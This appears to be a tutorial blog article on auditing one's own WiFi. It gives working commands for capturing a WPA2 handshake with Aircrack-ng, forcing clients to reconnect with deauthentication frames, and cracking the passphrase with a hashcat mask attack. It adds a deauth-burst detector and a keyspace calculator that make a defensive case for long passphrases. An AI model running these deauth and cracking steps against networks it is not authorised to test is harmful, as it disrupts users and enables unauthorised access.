WiFi is used in almost every home and business. This is understandable, given how convenient internet connectivity becomes with WiFi. That convenience comes at a price, and the price is privacy: because WiFi is wireless, anyone within radio range of the router can capture your traffic and attempt to gain access to your network.
In this article I want to show you how to test your own network and see how easy it is to gain access to it.
To perform this task we need a few software and hardware tools:
Raspberry Pi 3/4 running Raspberry OS
WiFi adaptor with monitor mode capabilities
Capturing a WPA/WPA2 Handshake
The handshake is the exchange in which the client device and the router agree on the keys that encrypt the data and secure the connection.
We will make use of a penetration testing tool called Aircrack-ng.
Install Aircrack-ng on your Pi:
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install aircrack-ng
Discover the wireless interfaces on your system:
sudo airmon-ng
A list of the wireless interfaces will be shown:
PHY Interface Driver Chipset
phy0 wlan0 brcmfmac Broadcom 43430
phy1 wlan1 ath9k_htc Qualcomm Atheros Communications AR9271 802.11n
In this example we can see two wireless interfaces: wlan0 uses a Broadcom chipset and wlan1 a Qualcomm Atheros chipset.
We will use wlan1, since it supports monitor mode.
To start monitor mode on wlan1 run the following command:
sudo airmon-ng start wlan1
A virtual monitor-mode interface (wlan1mon) will be created; you can list the active interfaces with the following command:
sudo iwconfig
Now we can scan the surroundings for WiFi networks with the following command:
sudo airodump-ng wlan1mon --write SSID.txt
Select the network you wish to capture packets from, and take its BSSID and channel from the CSV file that airodump-ng writes under the SSID.txt prefix (SSID.txt-01.csv). Then capture on that BSSID and channel only, using the monitor interface created above (wlan1mon, not wlan0mon):
sudo airodump-ng wlan1mon --output-format pcap --bssid F0:9F:C0:AA:6C:B8 -c 6 --write test01
Now we will capture the WPA2-PSK handshake. aireplay-ng -0 sends deauthentication frames to the clients of the access point, which forces them to reconnect and perform the handshake again while airodump-ng is recording.
In a separate terminal run the following command to send 5 rounds of deauthentication frames:
sudo aireplay-ng -0 5 -a F0:9F:C0:AA:6C:B8 wlan1mon
Now you can stop both the capture and aireplay-ng.
Check whether the handshake was captured (airodump-ng numbers its output files, so the capture from the command above is test01-01.cap):
sudo aircrack-ng test01-01.cap
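The deauthentication step above is also what a defender can look for: a burst of deauthentication or disassociation frames for one BSSID within a short window is a strong signal that someone is forcing clients to re-handshake. The following script is an added example written for this article, not part of Aircrack-ng or the original text. It parses raw 802.11 management frames (frame control byte, address fields and the reason code), then flags any BSSID that sees more than a threshold of disconnect frames inside a sliding time window. The input frames are constructed in the script so it runs offline; the BSSID value reused from the airodump-ng example above is just sample data, and the window and threshold are arbitrary starting points.

```python
import struct
from collections import defaultdict

# 802.11 frame control byte 0: bits 0-1 protocol version, bits 2-3 type, bits 4-7 subtype.
# Management frames (type 0): subtype 12 = deauthentication, subtype 10 = disassociation.
DEAUTH_FC0 = 0xC0
DISASSOC_FC0 = 0xA0
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def mac_bytes(s: str) -> bytes:
    return bytes(int(part, 16) for part in s.split(":"))


def parse_disconnect(frame: bytes):
    """Return (kind, dst, src, bssid, reason) for deauth/disassoc frames, None otherwise."""
    if len(frame) < 26:  # 24-byte MAC header + 2-byte reason code
        return None
    fc0 = frame[0]
    if fc0 == DEAUTH_FC0:
        kind = "deauth"
    elif fc0 == DISASSOC_FC0:
        kind = "disassoc"
    else:
        return None
    dst, src, bssid = mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])
    (reason,) = struct.unpack_from("<H", frame, 24)  # fixed body starts right after the header
    return kind, dst, src, bssid, reason


def build_deauth(dst: str, src: str, bssid: str, reason: int, seq: int = 0) -> bytes:
    """Build a raw deauthentication frame as constructed test input (never transmitted)."""
    header = bytes([DEAUTH_FC0, 0x00]) + b"\x00\x00"  # frame control, duration
    header += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    header += struct.pack("<H", seq << 4)  # sequence control: sequence number in the high 12 bits
    return header + struct.pack("<H", reason)


def find_bursts(frames, window: float = 2.0, threshold: int = 3) -> dict:
    """frames: iterable of (timestamp_seconds, raw_frame).
    Returns {bssid: max disconnect frames seen in any `window` seconds} for BSSIDs at or above threshold."""
    times = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_disconnect(raw)
        if parsed:
            times[parsed[3]].append(ts)
    alerts = {}
    for bssid, ts_list in times.items():
        ts_list.sort()
        best, start = 0, 0
        for end in range(len(ts_list)):  # sliding window over sorted timestamps
            while ts_list[end] - ts_list[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[bssid] = best
    return alerts


# Constructed sample capture: five broadcast deauths in half a second (the pattern a deauth
# tool produces), one beacon that must be ignored, and one isolated deauth a minute later.
AP = "f0:9f:c0:aa:6c:b8"  # sample BSSID, taken from the article's airodump-ng example
SAMPLE = [(0.1 * i, build_deauth(BROADCAST, AP, AP, reason=7, seq=i)) for i in range(5)]
SAMPLE.append((3.0, bytes([0x80, 0x00]) + b"\x00" * 30))  # beacon frame (subtype 8), not a disconnect
SAMPLE.append((60.0, build_deauth("aa:bb:cc:dd:ee:01", AP, AP, reason=3, seq=9)))  # normal single deauth

if __name__ == "__main__":
    print(find_bursts(SAMPLE))  # {'f0:9f:c0:aa:6c:b8': 5}
```

To run this against a real capture you would feed it (timestamp, frame) pairs read from the pcap that airodump-ng writes; on a network without radiotap headers the frame bytes start at the frame control field, otherwise skip the radiotap header length first. A wireless IDS does essentially this per channel, and the same logic can be extended to flag deauths whose source address claims to be the AP but arrive with a different signal strength than the AP's beacons.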
Now that you have the .cap file, copy it to a machine that is capable of running hashcat to start cracking it.
Hashcat
We will use Hashcat to crack the password. Hashcat is an open-source password recovery tool.
To install Hashcat on Windows, download the binaries from the Hashcat website.
To install Hashcat on Linux run the following command:
sudo apt-get install hashcat
or download the binaries (note that hash mode 22000 used below exists only in hashcat 6.0.0 and newer, so take the current release rather than an old archive such as the one below):
wget https://hashcat.net/files/hashcat-2.00.7z
Hash mode 22000 expects the hc22000 format, not the older .hccapx used by mode 2500, so first convert the capture (for example with hcxpcapngtool from the hcxtools package, or the cap2hashcat converter on the Hashcat website):
hcxpcapngtool -o capture.hc22000 test01-01.cap
Then start the password recovery (on Linux the binary is called hashcat instead of hashcat.exe). -a 3 selects a mask attack, and the mask ?d?d?d?d?d?d?d?d tries every 8-digit numeric passphrase:
hashcat.exe -m 22000 -a 3 capture.hc22000 ?d?d?d?d?d?d?d?d
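Why the mask attack works, and what it costs, is worth seeing in code. The script below is an added example for this article (not Hashcat's code): it derives the WPA2 pairwise master key exactly as the standard specifies, PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt and 4096 rounds, which is the work a cracker repeats once per candidate. It then counts how many candidates a hashcat mask such as ?d?d?d?d?d?d?d?d enumerates and turns that into a time estimate. The PMK check uses the well-known test vector from the 802.11 standard (passphrase "password", SSID "IEEE"); the guess rate in the demo is an assumed figure, not a measurement.

```python
import hashlib

# Charset sizes of hashcat's built-in mask placeholders:
# ?d digits, ?l lowercase, ?u uppercase, ?s printable symbols (incl. space), ?a all printable ASCII.
MASK_CHARSETS = {"d": 10, "l": 26, "u": 26, "s": 33, "a": 95}


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    A cracker must compute this for every candidate passphrase before it can test the
    handshake MIC, so the 4096 rounds are the only per-guess cost a defender gets."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def mask_keyspace(mask: str) -> int:
    """Number of candidates a hashcat -a 3 mask enumerates.
    '??' is a literal question mark; any other literal character contributes one choice."""
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            tag = mask[i + 1]
            if tag == "?":
                pass  # literal '?', one choice
            elif tag in MASK_CHARSETS:
                total *= MASK_CHARSETS[tag]
            else:
                raise ValueError(f"unknown placeholder ?{tag}")
            i += 2
        else:
            i += 1
    return total


def hours_to_exhaust(mask: str, guesses_per_second: float) -> float:
    """Worst-case hours to try every candidate of the mask at the given PMK rate."""
    return mask_keyspace(mask) / guesses_per_second / 3600.0


if __name__ == "__main__":
    # Known-answer check: passphrase "password", SSID "IEEE" (test vector from the 802.11 standard).
    print(wpa2_pmk("password", "IEEE").hex())
    # Assumed rate for illustration only; real throughput depends entirely on the GPU.
    rate = 500_000
    for m in ["?d?d?d?d?d?d?d?d", "?l?l?l?l?l?l?l?l", "?a?a?a?a?a?a?a?a?a?a?a?a"]:
        print(f"{m:28s} {mask_keyspace(m):>24,d} candidates  ~{hours_to_exhaust(m, rate):,.1f} h")
```

The numbers make the defensive point: an 8-digit passphrase is 10^8 candidates and falls in under an hour at the assumed rate, whereas a 12-character passphrase drawn from all printable ASCII is about 5.4 x 10^23 candidates, far beyond any realistic budget. Passphrase length and character variety, not the 4096 PBKDF2 rounds, are what protect a WPA2-PSK network once a handshake has been captured.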